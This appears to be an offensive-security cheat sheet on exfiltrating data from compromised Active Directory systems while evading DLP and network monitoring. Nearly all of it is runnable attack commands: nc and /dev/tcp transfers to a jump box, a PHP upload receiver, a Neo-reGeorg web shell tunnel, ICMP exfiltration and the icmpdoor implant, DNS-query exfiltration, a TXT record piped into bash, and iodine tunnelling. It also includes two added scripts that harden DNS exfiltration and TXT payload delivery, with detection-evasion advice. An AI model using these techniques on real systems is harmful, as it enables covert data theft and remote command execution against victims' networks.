09 / Data Exfiltration

Data Exfiltration

Extract sensitive data from compromised AD systems using covert channels — TCP, SSH, HTTP(S), ICMP and DNS — to avoid detection by DLP or network monitoring.


TCP Exfiltration

nc / tar / base64
1. Start listener on jump box
ssh jumpbox@jumpbox_ip
nc -lvp 8080 > /tmp/borrowed.data
2. On target — tar, base64, EBCDIC, send (bash's /dev/tcp pseudo-device; the EBCDIC pass only defeats naive ASCII keyword matching in DLP, it is not encryption)
tar zcf - files_and_folders/ | base64 | dd conv=ebcdic > /dev/tcp/jumpbox_ip/8080
3. On jump box — convert back to ASCII, decode, extract (the archive is gzipped; GNU tar detects that on extract)
dd conv=ascii if=/tmp/borrowed.data | base64 -d > /tmp/borrowed_data.tar.gz
tar xvf /tmp/borrowed_data.tar.gz

SSH Exfiltration

tar over SSH (the content is encrypted in transit, so monitoring sees only an SSH session to the jump box)
tar cf - files_and_folders/ | ssh jumpbox@jumpbox_ip "cd /tmp && tar xpf -"

HTTP(S) Exfiltration

curl POST / PHP receiver
1. Set up the PHP receiver on the attacker web server (serve /tmp so contact.php is reachable; the built-in server needs root for port 80)
nano /tmp/contact.php
# content:
<?php
if (isset($_POST['file'])) {
  $file = fopen("/tmp/http.bs64", "w");
  fwrite($file, $_POST['file']);
  fclose($file);
}
?>
cd /tmp && sudo php -S 0.0.0.0:80
# PHP's post_max_size (8M by default) caps a single upload; split bigger archives into several POSTs
2. From target — POST the data
# --data sends the base64 unencoded, so every '+' is decoded as a space server-side (repaired in step 3);
# --data-urlencode "file=$(tar zcf - files_and_folders | base64 -w0)" avoids that repair step entirely
curl --data "file=$(tar zcf - files_and_folders | base64)" http://webserver_ip/contact.php
3. On attacker — restore the '+' characters and decode
sudo sed -i 's/ /+/g' /tmp/http.bs64
base64 -d /tmp/http.bs64 | tar xvzf -

HTTP Tunnelling

Neo-reGeorg
git clone https://github.com/L-codes/Neo-reGeorg.git
cd Neo-reGeorg
python3 neoreg.py generate -k password
# the server-side scripts (tunnel.php, tunnel.aspx, tunnel.jsp, ...) are written to neoreg_servers/;
# upload tunnel.php to the victim web server, then start the local SOCKS end:
python3 neoreg.py -k password -u http://victim_webserver_ip/path_to/tunnel.php
# proxy opens on 127.0.0.1:1080; everything rides in ordinary HTTP(S) requests to the web server. Use with curl or proxychains:
curl --socks5 127.0.0.1:1080 http://$TARGET_IP:80

ICMP Data Transfer & Command Execution

Metasploit / icmpdoor
ICMP data exfiltration via Metasploit
# icmp_exfil watches echo requests: a payload starting with ^BOF opens a file named by the rest of the
# payload, the following payloads are appended as data, and ^EOL closes the file (the START_TRIGGER /
# END_TRIGGER defaults). Stop the attacker's kernel answering pings itself, so the module's replies
# are the only ones the target gets: sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
msfconsole
use auxiliary/server/icmp_exfil
set BPF_FILTER icmp and not src $ATTACKER_IP
set INTERFACE eth0
run
# on target — open the file, send the content (chunk anything larger than the path MTU), close it:
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "^BOFfile.txt"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "$(cat file.txt)"
sudo nping --icmp -c 1 $ATTACKER_IP --data-string "^EOL"
ICMP command execution (icmpdoor)
# icmpdoor is the implant and runs on the target; icmp-cnc is the controller and runs on the attacker.
# -d is the other side's address, -i the interface facing it; both need root for raw sockets.
# Target:
sudo icmpdoor -i eth0 -d $ATTACKER_IP
# Attacker:
sudo icmp-cnc -i eth0 -d $TARGET_IP

DNS Exfiltration

dig / TXT records
Setup — add DNS records on your server so that queries for anything under att.$ATTACKER_DOMAIN are sent to the attacker host
# A-record:  attNS → $ATTACKER_IP
# NS-record: att  → attNS.$ATTACKER_DOMAIN
1. Start tcpdump on attacker (the query names carry the data; nothing has to answer them)
sudo tcpdump -i eth0 udp port 53 -v
2. From target — encode file and send via DNS queries
# builds one name out of 18-character labels and queries it once; the target's resolver follows the
# delegation and forwards it to attNS. Limits: 63 octets per label and 253 octets per name, so this
# one-shot form only fits a small file, and base64's '+', '/' and '=' are not hostname characters,
# which some resolvers reject
cat borrowed_file.txt | base64 | tr -d "\n" | fold -w18 | sed 's/.*/&./' | tr -d "\n" \
  | sed s/$/att.$ATTACKER_DOMAIN/ | awk '{print "dig +short " $1}' | bash
3. Decode the name seen in tcpdump (copy it without the att.$ATTACKER_DOMAIN suffix; the label dots are dropped here)
echo "base64_string" | tr -d '.' | base64 -d
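The one-shot pipeline above fits a single query name. Anything larger has to be spread over several queries, and the receiving side has to cope with resolver retries and out-of-order arrival. The script below is an added example, not part of the original page: it encodes with base64url so no '+', '/' or '=' ends up in a name, keeps every label at or under 63 octets and every name well under 253, prefixes each name with a sequence label so the receiver can reorder and deduplicate, and rebuilds the file from the query names copied out of tcpdump. The att.<zone> suffix follows the page's setup; LABEL_LEN, LABELS_PER_QUERY, the 4-digit sequence label and the function names are my own conventions.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): split a file into DNS-safe query names and
# rebuild it from the names seen in a capture. att.<zone> follows the page's setup; the
# 4-digit sequence label, LABEL_LEN, LABELS_PER_QUERY and the function names are my own.
set -eu

LABEL_LEN=60        # a label holds at most 63 octets (RFC 1035)
LABELS_PER_QUERY=3  # 5 + 3*61 octets of sequence and data labels leave room for any short zone under the 253-octet name limit

# dns_encode_names FILE ZONE -> one query name per line: <seq>.<label>.<label>.<label>.ZONE
#   base64url keeps '+', '/' and '=' (not hostname characters) out of the names; padding is restored on decode
dns_encode_names() {
  local file="$1" zone="$2" payload chunk seq_no=0 off=0 piece labels
  payload=$(base64 -w0 < "$file" | tr '/+' '_-' | tr -d '=')
  chunk=$((LABEL_LEN * LABELS_PER_QUERY))
  while [ "$off" -lt "${#payload}" ]; do
    # next slice of the payload, cut into labels of LABEL_LEN joined by dots
    piece=$(printf '%s' "$payload" | cut -c "$((off + 1))-$((off + chunk))")
    labels=$(printf '%s' "$piece" | fold -w "$LABEL_LEN" | paste -sd '.')
    printf '%04d.%s.%s\n' "$seq_no" "$labels" "$zone"
    seq_no=$((seq_no + 1))
    off=$((off + chunk))
  done
}

# dns_decode_names ZONE -> original bytes on stdout; reads query names on stdin (e.g. copied from tcpdump)
#   tolerates a trailing dot, duplicates from resolver retries and arbitrary arrival order:
#   strip the dot and the zone, order by sequence label keeping one copy per number,
#   drop the sequence label, join the data labels, map base64url back to base64
dns_decode_names() {
  local zone="$1" data pad
  data=$(sed -e 's/\.$//' -e "s/\.$zone\$//" |
    sort -t . -k 1,1n -u |
    cut -d . -f 2- |
    tr -d '.\n' |
    tr '_-' '/+')
  # restore the '=' padding removed on the sending side
  pad=$(( (4 - ${#data} % 4) % 4 ))
  while [ "$pad" -gt 0 ]; do data="$data="; pad=$((pad - 1)); done
  printf '%s' "$data" | base64 -d
}
```

On the target, pipe the names through dig (`dns_encode_names borrowed_file.txt att.$ATTACKER_DOMAIN | while read -r n; do dig +short "$n" >/dev/null; done`); on the attacker, feed the query names extracted from the tcpdump output, or from the authoritative server's query log, into `dns_decode_names att.$ATTACKER_DOMAIN`. Lowering LABELS_PER_QUERY or sleeping between queries trades speed for a less conspicuous query rate; a burst of long, high-entropy names to one zone is exactly what DNS exfiltration detections look for.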
C2 via DNS TXT record
# Create script, base64-encode, add as TXT record: script.tunnel.com
# A TXT character-string holds at most 255 octets; a longer record is stored as several quoted strings
# and dig prints them space-separated, so strip the spaces as well or base64 -d fails on the gap
dig +short -t TXT script.tunnel.com | tr -d '" ' | base64 -d | bash
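The record side of the TXT trick is where people trip: anything over 255 octets must be split into several character-strings when the record is created, and the decoder on the target has to undo exactly what dig prints. The two helpers below are an added example, not from the original page; they produce the zone-file value for a script and decode `dig +short -t TXT` output back into the script. The record name script.tunnel.com is the page's, the helper names are mine.

```shell
#!/usr/bin/env bash
# Added example (not from the original page): build the TXT record data for a script and
# decode what `dig +short -t TXT` returns. script.tunnel.com is the page's record name.
set -eu

# txt_record_for SCRIPT -> zone-file record data, one quoted string per 255 octets
#   (RFC 1035 limits a TXT character-string to 255 octets; longer records are several strings)
txt_record_for() {
  base64 -w0 < "$1" | fold -w 255 | sed 's/.*/"&"/' | paste -sd ' '
}

# txt_decode -> original script bytes on stdout; reads the dig +short output on stdin
#   dig prints the strings as "aaa" "bbb": remove the quotes AND the separating spaces,
#   GNU base64 -d rejects anything outside its alphabet apart from newlines
txt_decode() {
  tr -d '" \n' | base64 -d
}

# on the target (not run here):  dig +short -t TXT script.tunnel.com | txt_decode | bash
```

Paste the output of txt_record_for after `script.tunnel.com. IN TXT` in the zone; if the zone is managed through a web console, most providers do the 255-octet split themselves, but the decoder still has to handle the space-separated strings dig prints.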

DNS Tunnelling (TCP over DNS)

iodine
# iodine carries IPv4 traffic (a tun interface on each end) inside DNS queries to a zone the attacker
# is authoritative for; att.tunnel.com needs the same NS delegation as in the DNS exfiltration setup.
# 1. Attacker — start iodined. The address is the attacker's own tunnel-side IP ($TUNNEL_IP); the jump
#    box is assigned the next free address in that /24 when it connects. -c skips the client IP/port
#    check (needed behind NAT), -f stays in the foreground
sudo iodined -f -c -P password $TUNNEL_IP/24 att.tunnel.com

# 2. Jump box — connect (it only needs to resolve names through its normal resolver, no direct route)
sudo iodine -P password att.tunnel.com

# 3. Attacker — tcpdump to verify the queries arrive
sudo tcpdump -i eth0 udp port 53

# 4. Attacker — SSH to the jump box over the tunnel and open a SOCKS proxy through it
#    ($JUMPBOX_TUNNEL_IP is the address iodine assigned to the jump box in step 2)
sudo ssh jumpbox@$JUMPBOX_TUNNEL_IP -4 -f -N -D 1080

# 5. Use via SOCKS proxy
curl --socks5 127.0.0.1:1080 http://page_you_want_to/access.php